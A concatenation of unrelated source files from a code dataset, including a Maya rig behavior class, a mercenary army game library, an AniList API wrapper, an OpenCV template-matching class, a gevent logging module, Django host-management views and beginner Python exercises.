jointGroup)\n \n def Setup_Constraint_ControlsToXforms(self, limb, \n xforms, hasPosCst, hasRotCst, hasScaleCst):\n log.funcFileDebug()\n xform = xforms[0]\n group = rigUtil.GetLimbGroups(limb, self.groupType)[0]\n control = pm.listConnections(group.control)[0]\n if hasPosCst:\n pm.pointConstraint(xform, control)\n if hasRotCst:\n pm.orientConstraint(xform, control)\n if hasScaleCst:\n pm.scaleConstraint(xform, control)\n return [control]\n \n#============= TEARDOWN ============================\n\n def Teardown_Rig_Controls(self, limb):\n log.funcFileDebug()\n if pm.listConnections(limb.limbParent):\n group = pm.listConnections(limb.limbGroups)[0]\n cst = pm.listRelatives(group, c=1, type='parentConstraint')\n pm.delete(cst)\n\n def Teardown_Constraint_JointsToControls(self, limb):\n log.funcFileDebug()\n joint = pm.listConnections(limb.joints)[0]\n # jointGroup = pm.listConnections(joint.group)[0]\n pm.delete(pm.listRelatives(joint, c=1, type='constraint'))\n # pm.delete(pm.listRelatives(jointGroup, c=1, type='constraint'))\n \n def Teardown_Constraint_ControlsToXforms(self, limb):\n log.funcFileDebug()\n group = rigUtil.GetLimbGroups(limb, self.groupType)[0]\n control = pm.listConnections(group.control)[0]\n pm.delete(pm.listRelatives(control, c=1, 
type='constraint'))\n \n#============= EDITABLE UI ============================\n\n def Setup_Behavior_Limb_UI(self, limb):\n log.funcFileDebug()\n return False\n \n#============= ANIMATION UI ============================\n\n def Setup_AnimationTools_Limb_UI(self, limb):\n return False # return if UI is enabled\n \n \n# Copyright (c) 2021 Trevor Payne\n# See user license in \"PayneFreeRigSuite\\Data\\LicenseAgreement.txt\"\n","sub_path":"Behaviors/Empty_01.py","file_name":"Empty_01.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"32944126","text":"import random\nimport numpy as np\nfrom scipy.stats import norm\nimport io\nfrom datetime import datetime, timedelta\nimport math\nimport pygame\n\nimport merc\nimport events\nimport army as arm\n\nfirstnames = [] # Mercenaries randomly made of\nlastnames = []\n\npikemanImg = pygame.image.load('res/pikeman.png')\ncavalryImg = pygame.image.load('res/cavalry.png')\nmusketeerImg = pygame.image.load('res/musketeer.png')\n\n\ndef bellAge() -> []:\n x = [random.randint(1, 100) for i in range(100)]\n mean = np.mean(x)\n sd = np.std(x)\n pdf = list(map(lambda x: ((x-18) /2) +18, (np.pi*sd) * np.exp(-0.5*((x-mean)/sd)**2)))\n return round(pdf[random.randint(0, 99)])\n\n\ndef readNames():\n with io.open(\"res/firstnames.txt\", mode = \"r\", encoding = \"utf-8\") as file:\n global firstnames\n firstnames = file.readlines()\n for i in range(len(firstnames)):\n firstnames[i] = firstnames[i].strip(\"\\n\")\n \n with io.open(\"res/familynames.txt\", mode = \"r\", encoding = \"utf-8\") as file:\n global lastnames\n lastnames = file.readlines()\n for i in range(len(lastnames)):\n lastnames[i] = lastnames[i].strip(\"\\n\")\n\n\ndef oneToTwoSeconds():\n # return random.randint(100, 200) /100\n return random.randint(0, 100) /100\n\n\ndef makeRecruit():\n rec = merc.Merc()\n random.seed()\n rec.firstname = random.choice(firstnames)\n rec.lastname = random.choice(lastnames)\n rec.pay = random.randint(2, 16)\n rec.strength = random.randint(1, 255)\n rec.dexterity = random.randint(1, 255)\n rec.intelligence = random.randint(1, 255)\n rec.charisma = random.randint(1, 255)\n rec.confidence = random.randint(1, 255)\n rec.birthday = events.Event.pointInTime - timedelta(days =365 * bellAge() + random.randint(1, 365))\n # Perks:\n perks = merc.perkList[:]\n if roll(30):\n rec.perks.append(perks.pop(random.randint(0, len(perks)-1)))\n if roll(20):\n rec.perks.append(perks.pop(random.randint(0, len(perks)-1)))\n if roll(10):\n rec.perks.append(perks.pop(random.randint(0, len(perks)-1)))\n \n # for i in range(3): # max 3 perks\n # prob = random.randint(0, 11) # probability\n # if i >= prob:\n # while True: # no duplicates\n # perk = getRandomPerk()\n # found = False\n # for p in rec.perks:\n # if p.name == perk.name:\n # found = True\n # if found: continue\n # rec.perks.append(perk)\n # break\n return rec\n\ndef roll(prob):\n return prob in range(random.randint(1, 100), 100)\n\ndef make10Recs():\n mercs = []\n for i in range(10):\n mercs.append(makeRecruit())\n return mercs\n\n\ndef make100Recs():\n return list(map(lambda x:makeRecruit(), range(100)))\n\n\ndef getRandomPerk():\n rand = random.randint(0, len(merc.perkList) -1)\n return merc.perkList[rand]\n\n\ndef getRandomTroopType():\n rand = random.randint(0, 2)\n if rand == 0: return merc.UnitType.pikeman\n if rand == 1: return merc.UnitType.cavalry\n if rand == 2: return merc.UnitType.musketeer\n\n\ndef 
getRandomPikemen(count):\n    pm = []\n    for i in range(count):\n        rec = makeRecruit()\n        rec.xp.typ = merc.UnitType.pikeman\n        pm.append(rec)\n    return pm\n\n\ndef randomArmy(noofSectors, noofTroops):\n    army = arm.Army(noofSectors)\n    pikemen = []\n    cavalryMen = []\n    musketeers = []\n    for t in range(noofTroops):\n        recruit = makeRecruit()\n        recruit.xp.typ = getRandomTroopType()\n        if recruit.xp.typ == merc.UnitType.pikeman:\n            pikemen.append(recruit)\n        if recruit.xp.typ == merc.UnitType.cavalry:\n            cavalryMen.append(recruit)\n        if recruit.xp.typ == merc.UnitType.musketeer:\n            musketeers.append(recruit)\n    # hand each sector its own contiguous share of every troop list\n    for i, s in enumerate(army.sectors):\n        p_share = math.floor(len(pikemen) / len(army.sectors))\n        c_share = math.floor(len(cavalryMen) / len(army.sectors))\n        m_share = math.floor(len(musketeers) / len(army.sectors))\n        s.pikemen = pikemen[p_share * i:p_share * (i + 1)]\n        s.cavalryMen = cavalryMen[c_share * i:c_share * (i + 1)]\n        s.musketeers = musketeers[m_share * i:m_share * (i + 1)]\n    return army\n\n\ndef buildLowArmy(sectors, pikemen = 0, cavalryMen = 0, musketeers = 0):\n    p = getRandomPikemen(pikemen)\n    army = arm.Army()\n    for i in range(sectors):\n        army.sectors.append(arm.Sector('Sector ' + str(i), p))\n    return army\n\n\ndef countWounds(army: arm.Army):\n    w = 0\n    for s in army.sectors:\n        # sum the wounds of all three troop types in the sector\n        for p in s.pikemen:\n            w += p.wounds\n        for p in s.cavalryMen:\n            w += p.wounds\n        for p in s.musketeers:\n            w += p.wounds\n    return w","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"252729052","text":"# The contents of this file is free and unencumbered software released into the\n# public domain. For more information, please refer to \n\nfrom anilistWrapPY.errors.types import Error\nfrom dataclasses import dataclass\nfrom typing import Optional, Any, List\n\nfrom anilistWrapPY.utils import from_union, from_str, from_none, from_int, from_list, to_class\n\n\n@dataclass\nclass NextAiringEpisode:\n    airing_at: Optional[int] = None\n    time_until_airing: Optional[int] = None\n    episode: Optional[int] = None\n\n    @staticmethod\n    def from_dict(obj: Any) -> 'NextAiringEpisode':\n        assert isinstance(obj, dict)\n        airing_at = from_union([from_int, from_none], obj.get(\"airingAt\"))\n        time_until_airing = from_union([from_int, from_none], obj.get(\"timeUntilAiring\"))\n        episode = from_union([from_int, from_none], obj.get(\"episode\"))\n        return NextAiringEpisode(airing_at, time_until_airing, episode)\n\n    def to_dict(self) -> dict:\n        result: dict = {}\n        result[\"airingAt\"] = from_union([from_int, from_none], self.airing_at)\n        result[\"timeUntilAiring\"] = from_union([from_int, from_none], self.time_until_airing)\n        result[\"episode\"] = from_union([from_int, from_none], self.episode)\n        return result\n\n\n@dataclass\nclass Title:\n    romaji: Optional[str] = None\n    english: Optional[str] = None\n    native: Optional[str] = None\n\n    @staticmethod\n    def from_dict(obj: Any) -> 'Title':\n        assert isinstance(obj, dict)\n        romaji = from_union([from_str, from_none], obj.get(\"romaji\"))\n        english = from_union([from_none, from_str], obj.get(\"english\"))\n        native = from_union([from_str, from_none], obj.get(\"native\"))\n        return Title(romaji, english, native)\n\n    def to_dict(self) -> dict:\n        result: dict = {}\n        result[\"romaji\"] = from_union([from_str, from_none], self.romaji)\n        result[\"english\"] = from_union([from_none, from_str], self.english)\n        result[\"native\"] = from_union([from_str, from_none], self.native)\n        return result\n\n\n@dataclass\nclass Media:\n    id: Optional[int] = None\n    banner_image: Optional[str] = None\n    
episodes: Optional[int] = None\n title: Optional[Title] = None\n site_url: Optional[str] = None\n next_airing_episode: Optional[NextAiringEpisode] = None\n\n @staticmethod\n def from_dict(obj: Any) -> 'Media':\n assert isinstance(obj, dict)\n id = from_union([from_int, from_none], obj.get(\"id\"))\n banner_image = from_union([from_none, from_str], obj.get(\"bannerImage\"))\n episodes = from_union([from_int, from_none], obj.get(\"episodes\"))\n title = from_union([Title.from_dict, from_none], obj.get(\"title\"))\n site_url = from_union([from_str, from_none], obj.get(\"siteUrl\"))\n next_airing_episode = from_union([NextAiringEpisode.from_dict, from_none], obj.get(\"nextAiringEpisode\"))\n return Media(id, banner_image, episodes, title, site_url, next_airing_episode)\n\n def to_dict(self) -> dict:\n result: dict = {}\n result[\"id\"] = from_union([from_int, from_none], self.id)\n result[\"bannerImage\"] = from_union([from_none, from_str], self.banner_image)\n result[\"episodes\"] = from_union([from_int, from_none], self.episodes)\n result[\"title\"] = from_union([lambda x: to_class(Title, x), from_none], self.title)\n result[\"siteUrl\"] = from_union([from_str, from_none], self.site_url)\n result[\"nextAiringEpisode\"] = from_union([lambda x: to_class(NextAiringEpisode, x), from_none], self.next_airing_episode)\n return result\n\n\n@dataclass\nclass Page:\n media: Optional[List[Media]] = None\n\n @staticmethod\n def from_dict(obj: Any) -> 'Page':\n assert isinstance(obj, dict)\n media = from_union([lambda x: from_list(Media.from_dict, x), from_none], obj.get(\"media\"))\n return Page(media)\n\n def to_dict(self) -> dict:\n result: dict = {}\n result[\"media\"] = from_union([lambda x: from_list(lambda x: to_class(Media, x), x), from_none], self.media)\n return result\n\n\n@dataclass\nclass Data:\n page: Optional[Page] = None\n\n @staticmethod\n def from_dict(obj: Any) -> 'Data':\n assert isinstance(obj, dict)\n page = from_union([Page.from_dict, from_none], obj.get(\"Page\"))\n return Data(page)\n\n def to_dict(self) -> dict:\n result: dict = {}\n result[\"Page\"] = from_union([lambda x: to_class(Page, x), from_none], self.page)\n return result\n\n\n@dataclass\nclass AnilistAiring:\n data: Optional[Data] = None\n errors: Optional[List[Error]] = None\n\n @staticmethod\n def from_dict(obj: Any) -> 'AnilistAiring':\n assert isinstance(obj, dict)\n data = from_union([Data.from_dict, from_none], obj.get(\"data\"))\n return AnilistAiring(data)\n\n def to_dict(self) -> dict:\n result: dict = {}\n result[\"data\"] = from_union([lambda x: to_class(Data, x), from_none], self.data)\n return result\n","sub_path":"anilistWrapPY/Airing/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"103913587","text":"import math\nimport cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom math import sqrt\nclass functions:\n\n temp_bool=True\n input_bool=False\n\n def __init__(self,image,template,threshold,step):\n self.image=image\n self.template=template\n self.threshold = threshold\n self.sample_size=len(threshold)\n self.step=step\n self.samples=[]\n for i in range(self.sample_size):\n self.samples.append(image.copy())\n \n def get_avg(self,x, y,is_tmp):\n if is_tmp:\n current_image=self.template\n else: current_image = self.image\n\n r, s = 0, 0\n p = len(self.template)\n q = len(self.template[0])\n sum = 0\n for r in range(p):\n for s in range(q):\n sum = sum + 
current_image[x+r, y+s]\n return sum/(p*q)\n\n def calc_std(self,r,c,avg,is_tmp):\n if is_tmp:\n current_image=self.template\n else: current_image = self.image\n rows = len(self.template)\n columns = len(self.template[0])\n\n mt=np.zeros((rows,columns))\n for i in range(r,r+rows):\n for j in range(c,c+columns):\n #print(i,j)\n mt[i-r][j-c]=current_image[i][j]-avg\n return mt\n def scalar_product(self,m1,m2):\n\n rows=len(m1)\n columns = len(m1[0])\n #ret = np.zeros((rows,columns))\n sum=0\n for r in range(rows):\n for c in range(columns):\n sum+=m1[r][c]*m2[r][c]\n return sum\n\n def sqrr_std(self,im_std):\n rows = len(im_std)\n columns = len(im_std[0])\n\n sum=0\n for r in range(rows):\n for c in range(columns):\n sum+=im_std[r][c]*im_std[r][c]\n return sqrt(sum)\n def print_rectangles(self,res,c_r,c_r_temp):\n for i in range(self.sample_size):\n if res>self.threshold[i]:\n cv2.rectangle(self.samples[i],(c_r[0],c_r[1]),(c_r[0]+c_r_temp[0],c_r[1]+c_r_temp[1]),(0,0,255),5)\n\n def get_corr_matrix(self):\n tmp_std=self.calc_std(0,0,self.get_avg(0,0,self.temp_bool),self.temp_bool)\n sqrr_tmp_std = self.sqrr_std(tmp_std)\n rows_input = len(self.image)\n columns_input = len(self.image[0])\n print(\"Input sizes:\",str(rows_input),str(columns_input))\n rows_temp = len(self.template)\n columns_temp = len(self.template[0])\n print(\"Temp sizes:\",str(rows_temp),str(columns_temp))\n res=0\n corr_matrix=np.zeros((int((rows_input-rows_temp)/self.step)+1,int((columns_input-columns_temp)/self.step)+1))\n \n for r in range(0,rows_input-rows_temp+1,self.step):\n for c in range(0,columns_input-columns_temp+1,self.step):\n print(r,c)\n inp_std=self.calc_std(r,c,self.get_avg(r,c,self.input_bool),self.input_bool)\n op1=self.scalar_product(tmp_std,inp_std)\n sqrr_inp_std = self.sqrr_std(inp_std)\n op2=sqrr_inp_std*sqrr_tmp_std\n res=op1/op2\n self.print_rectangles(res,[c,r],[columns_temp,rows_temp]);\n print(res)\n corr_matrix[int(r/self.step)][int(c/self.step)] = res\n for i in range(self.sample_size):\n cv2.imshow(\"Sample_\"+str(i)+\"-Threshold: \"+str(self.threshold[i]),self.samples[i])\n cv2.imwrite(\"../output/out_\"+str(i)+\"-\"+str(self.threshold[i])+\".png\",self.samples[i])\n cv2.waitKey(0)\n return corr_matrix\n","sub_path":"code/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"109505277","text":"# coding:utf8\r\nimport cStringIO\r\nimport datetime\r\nimport sys\r\nimport traceback\r\n\r\nimport gevent\r\nfrom flask import request\r\n\r\nfrom feather import util\r\nfrom feather.util import serviceName\r\n\r\nDEBUG = 0\r\nINFO = 1\r\nNOTICE = 2\r\nWARNING = 3\r\nERROR = 4\r\nEXCEPTION = 5\r\n\r\nfp = None\r\nisPrint = True\r\nflushInterval = 10\r\nlevel = 0\r\nlevelPrefix = (\"debug\", \"info\", \"notice\", \"warning\", \"error\", \"exception\")\r\n\r\n\r\ndef init(logConfig={}):\r\n global isPrint, flushInterval, level\r\n isPrint = logConfig.get('isPrint', True)\r\n flushInterval = logConfig.get('flushInterval', 10)\r\n level = logConfig.get('level', 0)\r\n\r\n\r\ndef _autoFlush():\r\n while not fp.closed:\r\n fp.flush()\r\n if isPrint:\r\n sys.stdout.flush()\r\n gevent.sleep(flushInterval)\r\n\r\n\r\ndef setFp(f):\r\n global fp\r\n fp = f\r\n gevent.spawn(_autoFlush)\r\n\r\n\r\ndef isClosed():\r\n return fp.closed\r\n\r\n\r\ndef close():\r\n fp.close()\r\n\r\n\r\ndef write(level, fmt, args=None):\r\n if args:\r\n content = fmt % args\r\n else:\r\n content = fmt\r\n\r\n 
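The feather logging module in this record buffers writes and delegates flushing to a background greenlet: setFp (above) spawns _autoFlush, which loops until the file handle is closed. The same pattern as a self-contained sketch, assuming gevent is installed; the file name and interval are illustrative:

    import gevent

    def start_auto_flush(fp, interval=10):
        """Flush fp every `interval` seconds until it is closed."""
        def _loop():
            while not fp.closed:
                fp.flush()
                gevent.sleep(interval)  # cooperative sleep: yields to other greenlets
        return gevent.spawn(_loop)

    # usage sketch: handle = start_auto_flush(open('service.log', 'a'), interval=10)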
prefix = levelPrefix[level]\r\n strTime = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S,%f\")\r\n content = '%s [%s] : [%s] ' % (strTime, prefix, serviceName) + content + '\\n'\r\n if fp:\r\n fp.write(content)\r\n if isPrint:\r\n sys.stdout.write(content)\r\n else:\r\n sys.stdout.write(content)\r\n\r\n\r\ndef debug(fmt, *args):\r\n if level <= DEBUG:\r\n write(0, fmt, args)\r\n\r\n\r\ndef info(fmt, *args):\r\n if level <= INFO:\r\n write(1, fmt, args)\r\n\r\n\r\ndef notice(fmt, *args):\r\n if level <= NOTICE:\r\n write(2, fmt, args)\r\n\r\n\r\ndef warning(fmt, *args):\r\n if level <= WARNING:\r\n write(3, fmt, args)\r\n\r\n\r\ndef error(fmt, *args):\r\n if level <= ERROR:\r\n write(4, fmt, args)\r\n\r\n\r\ndef formatException(ei):\r\n sio = cStringIO.StringIO()\r\n traceback.print_exception(ei[0], ei[1], ei[2], None, sio)\r\n s = sio.getvalue()\r\n sio.close()\r\n if s[-1:] == \"\\n\":\r\n s = s[:-1]\r\n return s\r\n\r\n\r\ndef exception(fmt='', *args):\r\n if level <= EXCEPTION:\r\n if args:\r\n fmt = fmt % args\r\n\r\n info = formatException(sys.exc_info())\r\n if util.systemType == util.WINDOWS and type(info) == str:\r\n try:\r\n info = info.decode('gbk')\r\n except:\r\n pass\r\n\r\n fmt += '\\n%s' % info\r\n write(5, fmt)\r\n\r\n\r\ndef web(logLevel=NOTICE):\r\n if level <= logLevel:\r\n write(logLevel, 'web request log(ip:%s func:%s args:%s)'\r\n % (util.getWebRemoteAddr(), request.path[1:], {key:val for key, val in request.values.iteritems()}))\r\n\r\n\r\ndef stack(logLevel):\r\n if level <= logLevel:\r\n write(logLevel, ''.join(traceback.format_stack()))\r\n\r\n\r\nclass WebLog(object):\r\n def __init__(self, level=0):\r\n self._level = level\r\n\r\n def write(self, content):\r\n if level <= self._level:\r\n write(self._level, content[:-1])\r\n\r\n def setLevel(self, level):\r\n self._level = level\r\n","sub_path":"after/engine/feather/util/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"571984164","text":"import sys\nsys.path.append('../')\nfrom random import choice\nfrom Player import Player\nfrom typing import typing\n\nclass mage(Player):\n\n elements = [\"огненный\", \"водяной\", \"каменный\", \"електрический\"]\n\n def __init__(self):\n super().__init__()\n self.max_mana = 100\n self.mana = self.max_mana\n \n def add_mana(self, i):\n self.mana += i\n if self.mana > self.max_mana:\n self.mana = self.max_mana\n \n def add_max_mana(self, i):\n self.max_mana += i\n\n def levelUp(self):\n super().levelUp()\n self.add_max_mana(10)\n self.mana = self.max_mana\n self.add_intelligence(2)\n \n def skill_description(self):\n return \"1) Обычная атака. \\n2) Сильная атака. 
\\n3)Очень сильная атака\"\n\n def skill1(self):\n typing(\"Вы бьете врага.\")\n damage = 5 + self.strenght\n return damage\n \n def skill2(self):\n if self.mana >= 10:\n typing(\"Вы бросаете во врага малый \" + choice(self.elements) + \" шар.\")\n damage = 15 + self.intelligence\n self.add_mana(-10)\n return damage\n else:\n typing(\"Не хватает маны.\")\n\n def skill3(self):\n if self.mana >= 20:\n typing(\"Вы бросаете во врага \" + choice(self.elements) + \" шар.\")\n damage = 25 + self.intelligence\n self.add_mana(-20)\n return damage\n else:\n typing(\"Не хватает маны.\")\n\n def short_info(self):\n return \"Здоровье: \" + str(self.health) + \"\\nМана: \" + str(self.mana)\n \n def __str__(self):\n characteristics = { \"Имя\": self.name, \"Уровень\": self.lvl, \"Здоровье\": self.health, \"Мана\": self.mana, \"Сила\": self.strenght, \"Ловкость\": self.dexterity, \"Точность\": self.accuaracy, \"Интелект\":self.intelligence, \"Защита\": self.protection, \"Опыта до уровня\": 100-self.exp}\n out = ''\n for i in characteristics:\n out += i + ': ' + str(characteristics.get(i)) + '\\n'\n return out","sub_path":"class/mage.py","file_name":"mage.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"337529063","text":"# coding=utf-8\n\"\"\"\n@Time : 2017/11/29\n@Author : cms\n@Desc : 主机管理接口\n\"\"\"\nimport requests\nimport time\nimport threading\n\nfrom django.contrib.auth.decorators import login_required\nfrom operator import itemgetter # itemgetter用来去dict中的key,省去了使用lambda函数\n\nfrom influxdb_metrics.utils import query\nfrom hostapp.hostlist import iplist, pool\nfrom hostapp.nodeManager import models\nfrom .models import *\nfrom lib.nmclilib import NmcliNetork\nfrom logapp.views import *\nfrom visitapp.models import Access_manage\nnmc = NmcliNetork.Nmclilib()\nHost = iplist.HostManager()\n\n\n@params('/host/detail/', u'主机详情查看')\ndef host_detail(request: object, ip: object) -> object: # 主机详情页面\n try:\n list = Host.host_list_info(ip) # 主机详情\n data = Host.net_info(ip) # 网卡总表\n nlist = get_network_all(data, ip) # 网络详情\n bat = Host.disk_info_all(ip)\n bat.sort(key=itemgetter('equipment')) # 需要先排序,然后才能groupby。lst排序后自身被改变\n return render(request, 'host/detail.html', {'node_detail': list, 'nlist': nlist, 'dev': bat})\n except:\n logging.info('主机详情获取失败')\n return None\n\n\n# @login_required\n@params('/host/cpu/', u'CPU查看')\ndef cpu(request):\n # models.mongodb_cluster_master_node_r()\n # models.mongodb_cluster_master_node_rs()\n a = Access_manage.objects.all().values()\n print(a)\n obj = cpu_all_info.objects.all().values()\n for i in obj:\n lists_str = i['cpu_info']\n lists = eval(lists_str)\n # all_info = models.cpu_info.objects.all()\n # for i in all_info:\n # lists = i.cpu_info\n return render(request, 'host/cpu.html', {'cpumem': lists})\n\n\n# 管理主机列表\n@params('/host/list/', u'管理主机列表')\ndef host_list(request):\n # lists = models.node_list.objects.all()\n # list = Host.public_node_host('disk_info_all')\n # for i in lists:\n # list = i.disk_info\n # list = list['disk_info']\n obj = node_list.objects.all().values()\n for i in obj:\n print(i)\n print(1232134534)\n # lists_str = i['disk_info']\n\n lists = i['node_list']\n lists = eval(lists)\n return render(request, 'host/host.html', {'hlist': lists})\n\n\n# 获取改节点全部详情网络\ndef get_network_all(data, ip):\n nlist = []\n for val in data:\n if val['ip'] == ip:\n res = pool.public_api(ip, '/api/nmclic/status', data={'devname': val['dev_name']})\n nlist.append(res)\n 
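The Django views in this record (they continue below) rebuild Python structures from text stored in model fields with eval(), for example lists = eval(lists_str). eval() executes arbitrary expressions; when the stored text consists only of Python literals, ast.literal_eval is the safe near-drop-in replacement. A sketch, assuming the stored strings really are plain literals:

    import ast

    def load_field(raw: str):
        # literal_eval accepts only literal syntax (lists, dicts, numbers, strings),
        # so a payload like "__import__('os').system(...)" raises ValueError
        # instead of being executed.
        return ast.literal_eval(raw)

    # lists = load_field(i['node_list'])   # instead of: lists = eval(i['node_list'])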
return nlist\n\n\n\"\"\"\n网卡信息\n\"\"\"\n\n\n@params('/host/network/', u'网络信息')\ndef network(request):\n # data = Host.public_node_host('net_info')\n # models.mongodb_cluster_master_node_r()\n # models.mongodb_cluster_master_node_rs()\n net_infos = net_info.objects.all().values()\n net_all_infos = net_all_info.objects.all().values()\n # data = models.net_info.objects.all()\n # te = models.net_all_info.objects.all()\n # te = []\n # for item in data:\n # \tone = item\n # \tip = one['ip']\n # \tdevname = one['dev_name']\n # \tdates = pool.public_api(ip, '/api/nmclic/status', data = {'devname': devname})\n # \tif dates:\n # \t\tdates['wip'] = ip\n # \t\tdates.update(wip = ip)\n # \t\tte.append(dates)\n # \telse:\n # \t\tpass\n for i in net_infos:\n net_info_f = eval(i['net_info'])\n for i in net_all_infos:\n net_all_info_f = eval(i['net_all_info'])\n return render(request, 'host/network.html', {'netdata': net_info_f, 'dates': net_all_info_f})\n\n\n@login_required\ndef netinfo(request):\n data = Host.public_node_host('net_info')\n return JsonResponse(data=data, safe=False)\n\n\n# 获取网卡的详细信息\n@params('/host/card/detail/', u'查看网卡的详细信息')\ndef card_detail(request):\n # data = Host.public_node_host('net_info')\n ip = request.GET['wip']\n devname = request.GET['devname']\n data = pool.public_api(ip, '/api/nmclic/status', data={'devname': devname})\n return JsonResponse(data, safe=False)\n\n\n# 网速速度大小-时时\n@login_required\ndef network_polling(request):\n ip = request.GET['ip']\n devname = request.GET['devname']\n size = Host.netsize(ip, devname)\n # sql = query('select * from cpu_value ORDER BY time DESC limit 20')\n # print(sql)\n # print(size)\n return JsonResponse(data=size, safe=False)\n\n\n\"\"\"\n磁盘管理\n\"\"\"\n\n\n@params('/host/disk/', u'磁盘管理查看')\ndef disk(request):\n try:\n obj = disk_info.objects.all().values()\n for i in obj:\n lists_str = i['disk_info']\n lists = eval(lists_str)\n # data = Host.public_node_host('disk_info_all')\n # models.mongodb_cluster_master_node_rs()\n # data = models.disk_info.objects.all()\n # print(data)\n # print(111111)\n # for i in data:\n # list = i.disk_info\n return render(request, 'host/disk.html', {'result': lists})\n except Exception as e:\n print(e)\n\n\n\"\"\"\n单个设备管理详情(集群单个管理)\n\"\"\"\n\n\n@params('/host/one/disk/', u'查看单个设备')\ndef host_one_disk(request):\n ip = request.GET['ip']\n dev = request.GET['dev']\n data = Host.disk_info_all(ip)\n for val in data:\n if ip == val['ip'] and val['equipment'] == '/dev/' + dev:\n return render(request, 'volume/volume_dev.html', {'val': val})\n return render(request, 'volume/volume_dev.html', {'val': ''})\n\n\n\"\"\"\n判断磁盘格式化状态\n\"\"\"\n\n\n@login_required\ndef disk_status(request):\n ip = request.GET['ip']\n dev = request.GET['dev']\n dev = (dev.split('/'))[2]\n res = pool.public_api(ip, '/api/disk/fstype_disk', data={\"diskName\": dev})\n if res:\n return JsonResponse('yes', safe=False)\n else:\n return JsonResponse('no', safe=False)\n\n\n\"\"\"\n格式化磁盘\n\"\"\"\n\n\n@params('/host/dev/formatting/', u'格式化磁盘')\ndef formatting(request):\n ip = request.GET['ip']\n dev = request.GET['dev']\n dev = (dev.split('/'))[2]\n res = pool.public_api(ip, '/api/disk/format_disk', data={\"diskName\": dev})\n if res:\n return JsonResponse('yes', safe=False)\n else:\n return JsonResponse('no', safe=False)\n\n\n\"\"\"\n磁盘挂载\n\"\"\"\n\n\n@params('/host/dev/mount/', u'操作磁盘挂载')\ndef disk_mount(request):\n ip = request.GET['ip']\n dev = request.GET['dev']\n dev = (dev.split('/'))[2]\n res = pool.public_api(ip, '/api/disk/mount_disk', 
data={\"diskName\": dev})\n if res:\n return JsonResponse('yes', safe=False)\n else:\n return JsonResponse('no', safe=False)\n\n\n\"\"\"\n磁盘卸载\n\"\"\"\n\n\n@params('/host/dev/umount/', u'操作磁盘卸载')\ndef disk_umount(request):\n ip = request.GET['ip']\n dev = request.GET['dev']\n dev = (dev.split('/'))[2]\n res = pool.public_api(ip, '/api/disk/umount_disk', data={\"diskName\": dev})\n if res:\n return JsonResponse('yes', safe=False)\n else:\n return JsonResponse('no', safe=False)\n\n\n@login_required\ndef cpu_info(request):\n data = Host.public_node_host('cpu_all_info')\n # print(data)\n # print(21321321321321)\n # sql = [res for res in query('select * from cpu_value ORDER BY time DESC limit 1')]\n # print(sql)\n # print(1111111111111111111111111111111111)\n # data = Host.public_node_host('cpu_a_info')\n return JsonResponse(data=data, safe=False)\n\n\n\"\"\"\n查看内存信息\n\"\"\"\n\n\n@params('/host/memory/', u'内存信息查看')\ndef memory(request):\n # data = Host.public_node_host('memory_info')\n # models.mongodb_cluster_master_node_rs()\n # data = models.Memory_info.objects.all()\n data = Memory_info.objects.all().values()\n for i in data:\n ins = i['Memory_infos']\n lists = eval(ins)\n return render(request, 'host/memory.html', {'result': lists})\n\n\n# 获取所有 安装服务器节点\n@login_required\ndef host_online_ip(request):\n getip = pool.get_ip()\n return JsonResponse(data=getip, safe=False)\n\n\n@login_required\ndef host_ip_nodename(request):\n getip = pool.get_ip_nodename()\n return JsonResponse(data=getip, safe=False)\n","sub_path":"www/hostapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222810335","text":"import shutil\nimport platform\nimport os\n\nversion = '1.14.0'\ndestdir = os.path.join(version, '{0}-{1}'.format(platform.system(), platform.architecture()[0]))\nos.makedirs(destdir)\nprint('moving NFSIm to {0}\\n'.format(destdir))\nif platform.system() != 'Windows':\n shutil.move('NFsim', os.path.join(destdir, 'NFsim'))\nelse:\n shutil.move('NFsim.exe', os.path.join(destdir, 'NFsim.exe'))\n","sub_path":"dist/changeFilename.py","file_name":"changeFilename.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"367960599","text":"# Методы\nprint(\"Привет\".upper())\nprint(\"Привет\".replace(\"е\", \"@\"))\n# Списки\nfruit = list()\nprint(fruit)\nfruit = []\nprint(fruit)\nfruit = [\"Яблоко\", \"Апельсин\", \"Персик\" ]\nfruit.append(\"Банан\")\nfruit.append(\"Дыня\")\nprint(fruit)\n\nrandom = []\nrandom.append(True)\nrandom.append(100)\nrandom.append(1.1)\nrandom.append(\"Рандом\")\nprint(random)\n\nfruit = [\"Яблоко\", \"Апельсин\", \"Персик\"]\nprint(fruit[0])\nprint(fruit[1])\nprint(fruit[2])\n\ncolors = [\"синий\", \"зелёный\", \"жёлтый\"]\ntry:\n print(colors[3])\nexcept IndexError:\n print(\"Ошибка индекса\")\n\ncolors = [\"синий\", \"зелёный\", \"жёлтый\"]\nprint(colors)\ncolors[2] = \"красный\"\nprint(colors)\n\n\nprint(colors.pop())\nprint(colors)\ncolors.pop()\nprint(colors)\ncolors.pop()\n\ncolors_matrica = [\"синий\", \"красный\", \"зелёный\"]\ncolors = [\"фиолетовый\", \"коричневый\", \"жёлтый\"]\ncolors_matrica.pop()\nprint(colors_matrica + colors)\nprint(\"фиолетовый\" in colors)\nprint(\"черный\" not in colors 